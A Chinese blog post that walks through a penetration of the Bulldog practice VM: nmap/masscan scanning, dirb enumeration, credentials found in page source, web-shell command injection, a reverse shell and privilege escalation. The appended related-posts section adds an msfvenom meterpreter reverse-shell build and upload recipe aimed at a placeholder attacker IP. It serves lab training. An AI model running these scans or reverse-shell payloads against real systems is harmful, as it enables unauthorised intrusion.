【安全狐】靶机渗透_bulldog(附下载靶机地址)

最新推荐文章于 2024-05-07 16:35:55 发布
最新推荐文章于 2024-05-07 16:35:55 发布
阅读量3.5k 收藏 18
点赞数 11
分类专栏: Kali 网络渗透 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44893633/article/details/111569679
版权

目录

渗透测试の信息收集

一、主机发现

二、端口扫描(masscan/nmap)

三、端口服务

四、扫描子域名

五、渗透ing

六、反弹shell,提权

总结

靶机下载地址:

链接:https://pan.baidu.com/s/1UrPkBqoM-AshTiKOZCPRww 
提取码:aqhu 

渗透测试信息收集

( ip 系统信息 端口号 端口对应的服务 服务对应版本 子域名 whois c段 旁站等 )

一、主机发现

方法1   nmap -sn 192.168.106.0/24

方法二 netdiscover

      主动:netdiscover -i eth0 -r 192.168.106.0/24

      被动:netdiscover -p

二、端口扫描(masscan/nmap

masscan --rate=10000 --ports 0-65535  192.168.106.130

发包数默认为100

三、端口服务

nmap -sV -T4 -O -p 8080,23,80 IP

-sV服务版本 -T4速度(最高为5,推荐用4)  -O系统     -p  指定端口

nmap -T4 -sV -O -p 8080,80,23 192.168.106..130

开启了80、8080(http),23(ssh)端口

四、扫描子域名

dirb http://192.168.106.130

五、渗透ing

访问/admin

Brup抓包,发现明文提交

访问/dev

点击Web-Shell

需要身份认证:(请向服务器进行身份验证以使用Web-Shell)

邮箱可做用户名字典

查看源代码

发现 加密代码

解密网站解密

对应邮箱

尝试登陆

登录成功

无可操作内容

更换其他账号,也不可操作,点击Web-Shell,可用

不可执行其他命令

可拼接

有命令执行漏洞

编写反弹shell脚本

放在/var/www/html/

远程下载

成功

六、反弹shell,提权

kali监听端口

ls&python shell.py 执行脚本

反弹成功

SUPER ultimate PASSWORD you CANT get

无权限

提权成功!

 

总结

1 、网页源代码中往往隐藏着许多信息

2Msfconsole中的ssh爆破模块使用

3、查看历史记录、隐藏文件等,可能发现有用信息

4、源码中找到用户名和密码,登陆后的命令执行,可下载并汇总行反弹shell的脚本

5、查找时注意home目录下,查看某些文件用cat时是乱码,可以考虑用strings去查看,那可能是程序字符串。

6、一般反弹的shell不如终端,所以一般拿到后都是先利用python弹一个伪终端出来。

学习更多安全知识,请关注vx公众号“安全狐”

安全狐
关注
  • 11
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
专栏目录
DC-5靶机渗透笔记(有靶机下载链接)
qq_45900622的博客
05-29 1706
DC-5靶机下载地址下载链接 主机发现 a.查看本kali(攻击机)ip地址 ifconfigb.扫面本攻击机本网段发现靶机 nmap -sP 192.168.6.0/24 靶机ip为192.168.6.134 扫描靶机端口确认服务 nmap -A 192.168.6.134 发现靶机开放80端口,nginx 打开浏览器访问一下瞅瞅 访问192.168.6.134 浏览一下发现就contact有个提交界面 随便提交一下 刷新一下发现页脚码的时间多次变化 … 没啥头绪,用dirbuster扫面一下靶机
靶机渗透练习48-Hack Me Please
hirak0的博客
04-19 980
靶机描述 靶机地址:https://www.vulnhub.com/entry/hack-me-please-1,731/ Description Difficulty: Easy Description: An easy box totally made for OSCP. No bruteforce is required. Aim: To get root shell 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.11 注:靶机
[Vulnhub靶机] DC-1
最新发布
haosha。的博客
05-07 3965
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
OWASP靶机下载安装详细过程
热门推荐
xxx_Python的博客
05-22 2万+
OWASP靶机下载安装详细过程一、 OWASP靶机下载二、 VM虚拟机三、 OWASP安装四、 OWASP启动运行 一、 OWASP靶机下载 下载地址:https://sourceforge.net/projects/owaspbwa/files/. 一般可直接点击“Download Latest Version”下载最新版本的OWASP靶机 二、 VM虚拟机 安装可自行上网查看安装教程,本次使用VM15pro 三、 OWASP安装 保证磁盘容量有10G左右或以上,解压下载的OWASP压缩包 打开VM虚
1、靶机——Pinkys-Place v3(1)
qq_55202378的博客
09-20 560
Pinkys-Place
vulnhub——Earth靶机
Re1_zf的博客
10-28 2019
再次nmap进行扫描,之前返回HTTP400的页面就没问题了。攻击机开启监听,把接收到的文件命名为跟靶机文件相同的文件名。这里是一个命令执行的输入框,有命令执行漏洞存在的可能性。结合前面的用户名,找到之前扫出来的的登录页面尝试一下。前面两个密钥的解码都是乱码,只有最后一个可以正常解码。对反弹shell的命令进行一下base64编码试试。查看返回信息的话,应该就是执行的过程中出了什么差错。(注意这里的命令不一样了,少去了前面的部分)猜测一下后缀,测出来后缀为txt后缀。结合前面页面显示的密钥可以尝试一下。
OWASP靶机安全学习、测试
05-24
这里提供的是owasp靶机下载下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
OWASP Mutillidae II 靶机下载地址以及手册下载
11-02
OWASP Mutillidae II 靶机以及手册收集
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
渗透测试实战-Fowsniff靶机入侵-件资源
03-05
渗透测试实战-Fowsniff靶机入侵-件资源
构建完善的安全渗透测试环境:推荐工具、资源和下载链接
weixin_43263566的博客
02-14 3515
安全渗透环境准备(工具下载
靶机渗透测试(UA: Literally Vulnerable)
@小张小张的博客
11-19 1150
靶机渗透测试(): **Vulnhub靶机 ** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate) 目标:Covfefe is my Debian 9 based B2R VM, originally created as a CTF for SecTalks_BNE. It has three flags… flag进度:3/3 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关)
MS08-067靶机下载
边城浪子的博客
09-08 1617
利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,无奈没有靶机实验,真实的互联网中也没有这样的漏洞啊。 MS08-067靶机下载地址 链接: https://pan.baidu.com/s/13IS0vBZTduDHdInOrO4pyQ 提取码: ip53
kali渗透综合靶机(十四)--g0rmint靶机
WY92139010的博客
06-04 513
kali渗透综合靶机(十四)--g0rmint靶机 靶机下载地址:https://www.vulnhub.com/entry/g0rmint-1,214/ 一、主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24    二、端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.173    ...
红日安全靶机实战(一)
qq_41891666的博客
08-07 6156
0x01 入侵web服务器 0x 1.1 信息收集 首先使用 nmap 来扫描ip 段存活的主机 nmap -sn 192.168.127.0/24 这里网上有的用 netdiscover 来扫描,其实和 nmap -sn 扫描原理是一样的,都是通过arp 来实现扫描。 然后接着nmap 激进模式扫端口: nmap -A -T4 192.168.127.154 发现80端口,浏览器访问,发现是phpStudy 搭建的环境,而且网站根路径是C:/php/WWW: 0x 1.2 写webshell
渗透测试实战8——SickOS靶机入侵
浅浅的博客
05-10 3093
目录 一、实验环境 二、实验步骤 主动信息收集 端口探测——22端口 端口探测——80端口 1、目录探测 2、获取shell 3、提权 4、防火墙规则 一、实验环境 攻击机(Kali):192.168.247.181 靶机(SickOS):192.168.247.180 二、实验步骤 主动信息收集 1、主机发现 2、端口扫描 目标靶机开放8180端口和22...
靶机渗透测试(Mr-Robot: 1)
@小张小张的博客
11-05 1164
靶机渗透测试(Mr-Robot: 1): Vulnhub靶机 Mr-Robot: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(beginner-intermediate.) 目标:This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find 进
cfs内网渗透centos7靶机下载
12-05
为了在CentOS 7靶机上进行内网渗透,我们可以通过开放80端口并访问网站的方式进行下载。具体步骤如下: 1. 在Kali Linux上打开代理,以便访问CentOS 7靶机的网站。 2. 打开浏览器,输入CentOS 7靶机的IP地址和80端口号,访问网站。 3. 在网站上查找需要下载的文件,并下载到本地。 另外,我们还可以使用msfvenom生成一个meterpreter反向Shell,然后将其上传到CentOS 7靶机上进行下载。具体步骤如下: 1. 在Kali Linux上使用msfvenom生成一个meterpreter反向Shell,命令如下: ```shell msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> SessionCommunicationTimeout=0 SessionExpiration=0 -f elf > muma.elf ``` 其中,`<attacker IP>`和`<attacker port>`分别为攻击者的IP地址和端口号,`muma.elf`为生成的反向Shell文件名。 2. 将生成的反向Shell文件上传到CentOS 7靶机上,可以使用scp命令,命令如下: ```shell scp muma.elf <username>@<target IP>:<path> ``` 其中,`<username>`为CentOS 7靶机上的用户名,`<target IP>`为CentOS 7靶机的IP地址,`<path>`为上传文件的路径。 3. 在CentOS 7靶机上运行反向Shell文件,命令如下: ```shell ./muma.elf ``` 运行后,反向Shell会连接到攻击者的机器,攻击者可以通过反向Shell进行下载等操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值